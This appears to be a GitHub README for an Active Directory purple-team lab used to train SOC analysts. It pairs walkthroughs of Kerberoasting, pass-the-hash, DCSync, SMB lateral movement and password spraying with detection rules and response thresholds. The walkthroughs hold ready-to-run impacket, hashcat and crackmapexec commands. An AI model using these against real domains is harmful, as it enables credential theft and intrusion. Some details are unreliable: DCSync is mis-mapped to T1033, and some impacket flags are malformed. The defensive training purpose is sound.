Shivam-kumar-jha/ad-exploitation-lab

# Active Directory Exploitation Lab ## Overview ## Lab Architecture ┌─────────────────────────┐ │ Attacker (Kali) │ │ • Nmap, Metasploit │ │ • Impacket tools │ └──────────┬──────────────┘ │ Network attack ↓ ┌─────────────────────────┐ │ Windows Domain │ │ • DC (Active Directory) │ │ • Member Server │ │ • Workstations │ └──────────┬──────────────┘ │ Event logs ↓ ┌─────────────────────────┐ │ Splunk SIEM │ │ • Ingests Windows logs │ │ • Runs Sigma rules │ │ • Real-time alerts │ └─────────────────────────┘ ## Attacks Documented | # | Attack | T-Code | Files | Detection | |---|--------|--------|-------|-----------| | 1 | Kerberoasting | T1558.003 | [attacks/01-kerberoasting](attacks/01-kerberoasting) | [Sigma](detections/01-kerberoasting.yml) | | 2 | Pass-the-Hash | T1550.002 | [attacks/02-pth](attacks/02-pth) | [Sigma](detections/02-pth.yml) | | 3 | DCSync | T1033 | [attacks/03-dcsync](attacks/03-dcsync) | [Sigma](detections/03-dcsync.yml) | | 4 | Lateral Movement (SMB) | T1021.002 | [attacks/04-lateral](attacks/04-lateral) | [Sigma](detections/04-lateral.yml) | | 5 | Credential Harvesting | T1110.003 | [attacks/05-creds](attacks/05-creds) | [Sigma](detections/05-creds.yml) | ## Getting Started ### Prerequisites - VMware/Hyper-V with ≥12GB RAM - Windows Server 2019 ISO (with AD DS role) - Kali Linux 2024.x - Splunk Enterprise (free license) ### Setup (~55 minutes) # 1. Import domain controller VM # 2. Create test domain: attacklab.local # 3. Add 3 user accounts with varied permissions # 4. Install Splunk on separate VM # 5. Configure WEF (Windows Event Forwarding) to Splunk See [docs/SETUP.md](docs/SETUP.md) for the full guide. ## Attack Walkthroughs ### 1. Kerberoasting (T1558.003) **Objective:** Request TGS tickets for domain services and crack them offline. **Tools:** impacket-GetUserSPNs, hashcat # Request TGS for all SPNs python3 /usr/share/impacket/examples/GetUserSPNs.py -request \ attacklab.local/lowuser:password@dc.attacklab.local # Crack hashes offline hashcat -m 13100 kerberoast.txt wordlist.txt **Detection:** Splunk query identifies unusual SPN requests from non-service accounts. Sigma rule triggers on Event 4769 + 4768 correlation. **Evidence:** PCAP, log extracts, and Splunk alert screenshot in `evidence/`. ### 2. Pass-the-Hash (T1550.002) **Objective:** Reuse NTLM hash without cracking to move laterally. **Tools:** impacket-psexec, mimikatz # Extract NTLM hashes impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL # Pass the hash impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c \ administrator@member.attacklab.local cmd.exe **Detection:** Logon type 3 from unexpected sources; same hash reused across multiple machines. ### 3. DCSync (T1033) **Objective:** Impersonate a domain controller to extract all password hashes. **Tools:** impacket-secretsdump (DCSync mode), mimikatz impacket-secretsdump -dc-ip dc.attacklab.local \ attacklab.local/compromised_user:password@dc.attacklab.local **Detection:** Replication RPC calls from non-DC source; Event 4662 (Replication rights checked) + 4929 (Replication successful). ### 4. Lateral Movement via SMB (T1021.002) **Objective:** Move from compromised host to domain member using credentials. **Tools:** impacket-smbclient, impacket-psexec # Enumerate SMB shares impacket-smbclient -U 'attacklab\compromised_user%password' \ \\\\member.attacklab.local\\c$ # PSExec-style lateral movement impacket-psexec -U 'attacklab\compromised_user' -P 'password' \ 'member.attacklab.local' cmd.exe **Detection:** SMB admin$ access from non-admin source; unexpected cmd.exe spawned from svchost. ### 5. Credential Harvesting (T1110.003) **Objective:** Brute-force or spray weak domain credentials. **Tools:** crackmapexec # Password spray (avoid lockout — one attempt per user) crackmapexec smb member.attacklab.local -u users.txt -p 'P@ssw0rd123' \ --continue-on-success --loglevel DEBUG **Detection:** Multiple 4625 (failed logon) events from one source; threshold >5 in 5 minutes. ## Detections Summary | Attack | Alert Type | Threshold | Response | |--------|-----------|-----------|----------| | Kerberoasting | SPN request anomaly | 3+ SPNs/hour | Investigate account | | Pass-the-Hash | Hash reuse pattern | Same hash, 2+ machines | Kill sessions, reset password | | DCSync | Replication RPC from non-DC | Any occurrence | Block account, force password change | | Lateral Movement | Admin$ + cmd.exe process | Any + cmd.exe | Isolate host, terminate process | | Credential Spray | Failed logons | >5 in 5 min | Enforce MFA, implement lockout | ## SOC Analyst Use Case This lab trains analysts to: 1. Recognize attack patterns in Windows Event logs 2. Correlate events across multiple log sources 3. Distinguish false positives from real attacks 4. Escalate with evidence (PCAP + logs + screenshots) **Training scenario:** Alert fires on "4769 + 4768 correlation for user_X." Analyst checks: did user_X request TGS tickets for services they don't own? If yes — escalate to incident response. ## File Structure ## Key Takeaways - Real attack chains — not isolated techniques - MITRE ATT&CK mapping for every phase - Sigma detection rule for every attack - Purple team perspective: offense + defense together ## MITRE ATT&CK Coverage - T1558.003 — Kerberoasting - T1550.002 — Pass-the-Hash - T1033 — DCSync context - T1021.002 — Lateral Movement (SMB) - T1110.003 — Brute Force / Credential Spray **Coverage: 5 unique T-codes across 3 tactics (Credential Access, Lateral Movement, Reconnaissance)** ## How to Talk About This in Interviews **Status:** Research-grade lab, ready for interviews and internship discussion.